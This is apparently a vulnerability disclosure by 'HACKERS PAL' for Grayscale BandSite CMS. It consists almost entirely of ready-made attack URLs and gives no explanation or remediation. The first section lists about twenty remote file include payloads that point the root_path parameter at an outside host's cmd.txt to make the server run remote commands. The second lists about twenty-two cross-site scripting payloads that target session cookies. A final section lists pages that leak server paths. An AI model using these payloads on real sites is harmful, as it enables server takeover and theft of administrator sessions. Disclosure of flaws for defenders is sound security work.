Hello,,
Grayscale BandSite CMS Multiple Input Validation Vulnerabilities
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security (at) soqor (dot) net [email concealed]
Romote Include
includes/content/contact_content.php?GLOBALS[root_path]=http://psevil.go
oglepages.com/cmd.txt?
adminpanel/includes/mailinglist/mlist_xls.php?GLOBALS[root_path]=http://
psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addfliersform.php?GLOBALS[root_path]=http:
//psevil.googlepages.com/cmd.txt?
includes/content/contact_content.php?GLOBALS[root_path]=http://psevil.go
oglepages.com/cmd.txt?
adminpanel/includes/add_forms/addbioform.php?GLOBALS[root_path]=http://p
sevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addwearmerchform.php?GLOBALS[root_path]=ht
tp://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addlyricsform.php?GLOBALS[root_path]=http:
//psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addlinksform.php?GLOBALS[root_path]=http:/
/psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addinterviewsform.php?GLOBALS[root_path]=h
ttp://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addgenmerchform.php?GLOBALS[root_path]=htt
p://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addshowsform.php?GLOBALS[root_path]=http:/
/psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addreviewsform.php?GLOBALS[root_path]=http
://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addrelmerchform.php?GLOBALS[root_path]=htt
p://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addreleasepicform.php?GLOBALS[root_path]=h
ttp://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addreleaseform.php?GLOBALS[root_path]=http
://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addphotosform.php?GLOBALS[root_path]=http:
//psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addnewsform.php?GLOBALS[root_path]=http://
psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addmp3.php?GLOBALS[root_path]=http://psevi
l.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addmerchpicform.php?GLOBALS[root_path]=htt
p://psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addmerchform.php?GLOBALS[root_path]=http:/
/psevil.googlepages.com/cmd.txt?
adminpanel/includes/add_forms/addmembioform.php?GLOBALS[root_path]=http:
//psevil.googlepages.com/cmd.txt?
Xss
adminpanel/includes/helpfiles/help_news.php?the_band=<script>alert(docum
ent.cookie);</script>
adminpanel/includes/helpfiles/help_merch.php?the_band=<script>alert(docu
ment.cookie);</script>
adminpanel/includes/helpfiles/help_mp3.php?max_file_size_purdy=<script>a
lert(document.cookie);</script>
adminpanel/includes/mailinglist/sendemail.php?message_text=</textarea><s
cript>alert(document.cookie);</script>
adminpanel/includes/header.php?the_band=</title><script>alert(document.c
ookie);</script>
adminpanel/login_header.php?the_band=</title><script>alert(document.cook
ie);</script>
includes/content/bio_content.php?the_band=<Script>alert(document.cookie)
;</script>
includes/content/gbook_content.php?the_band=<script>alert(document.cooki
e);</script>
includes/content/interview_content.php?the_band=<script>alert(document.c
ookie);</script>
includes/content/links_content.php?the_band=<script>alert(document.cooki
e);</script>
includes/content/lyrics_content.php?the_band=<script>alert(document.cook
ie);</script>
includes/content/member_content.php?the_band=<script>alert(document.cook
ie);</script>
includes/content/merch_content.php?the_band=<script>alert(document.cooki
e);</script>
includes/content/mp3_content.php?the_band=<script>alert(document.cookie)
;</script>
includes/content/news_content.php?the_band=<script>alert(document.cookie
);</script>
includes/content/pastshows_content.php?the_band=<script>alert(document.c
ookie);</script>
includes/content/photo_content.php?the_band=<script>alert(document.cooki
e);</script>
includes/content/releases_content.php?the_band=<script>alert(document.co
okie);</script>
includes/content/reviews_content.php?the_band=<script>alert(document.coo
kie);</script>
includes/content/shows_content.php?the_band=<script>alert(document.cooki
e);</script>
includes/content/signgbook_content.php?the_band=<script>alert(document.c
ookie);</script>
includes/footer.php?this_year=<script>alert(document.cookie);</script>
Full path
includes/content/ open any file on this directory ..
includes/shows_preview.php
adminpanel/configform.php?submit=1
adminpanel/includes/mailinglist/disphtmltbl.php
adminpanel/includes/mailinglist/dispxls.php
adminpanel/includes/mailinglist/sendshows.php
adminpanel/includes/previews/preview_bio.php
adminpanel/includes/previews/preview_genmerch.php
adminpanel/includes/previews/preview_fliers.php
adminpanel/includes/previews/preview_gbook.php
adminpanel/includes/previews/preview_interviews.php
adminpanel/includes/previews/preview_links.php
adminpanel/includes/previews/preview_lyrics.php
adminpanel/includes/previews/preview_membio.php
adminpanel/includes/previews/preview_merchphotos.php
adminpanel/includes/previews/preview_mp3s.php
adminpanel/includes/previews/preview_news.php
adminpanel/includes/previews/preview_photos.php
adminpanel/includes/previews/preview_releases.php
adminpanel/includes/previews/preview_relmerch.php
adminpanel/includes/previews/preview_relphotos.php
adminpanel/includes/previews/preview_reviews.php
adminpanel/includes/previews/preview_shows.php
adminpanel/includes/previews/preview_wearmerch.php
adminpanel/includes/change_forms/change_bio.php
adminpanel/includes/change_forms/change_fliers.php
adminpanel/includes/change_forms/change_gbook.php
adminpanel/includes/change_forms/change_gen_merch.php
adminpanel/includes/change_forms/change_interview.php
adminpanel/includes/change_forms/change_links.php
adminpanel/includes/change_forms/change_lyrics.php
adminpanel/includes/change_forms/change_members.php
adminpanel/includes/change_forms/change_merch.php
adminpanel/includes/change_forms/change_merch_pic.php
adminpanel/includes/change_forms/change_mp3s.php
adminpanel/includes/change_forms/change_news.php
adminpanel/includes/change_forms/change_photos.php
adminpanel/includes/change_forms/change_rel_merch.php
adminpanel/includes/change_forms/change_rel_pic.php
adminpanel/includes/change_forms/change_releases.php
adminpanel/includes/change_forms/change_reviews.php
adminpanel/includes/change_forms/change_shows.php
adminpanel/includes/change_forms/change_wear_merch.php
WwW.SoQoR.NeT